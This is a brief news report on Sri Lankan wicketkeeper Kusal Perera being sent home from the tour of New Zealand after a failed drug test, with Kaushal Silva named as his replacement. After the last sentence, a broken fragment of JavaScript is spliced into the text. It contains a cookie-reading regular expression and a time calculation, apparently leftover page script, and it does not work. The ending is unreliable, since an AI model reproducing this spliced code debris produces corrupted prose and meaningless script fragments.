Sri Lankan keeper Kusal Perera has been sent home from the tour of New Zealand after failing a drug test.
Sri Lankan cricket confirmed the positive drug test in a statement on Monday.
The 25-year-old's A sample was randomly selected for testing and came back positive for a banned substance. His B sample will now be tested in order to "make every endeavour" to allow Perera to resume playing, Sri Lanka cricket said in a statement.
He will be replaced in the squad by Kaushal Silva.
The first Test against New Zealand will start on Thursday. "(/([.$?*|{}()[]\/+^])/g,"\$1")+"=([^;]*)"));(U[1]):"",();||void 0===time){/1e3+86400),.('')}
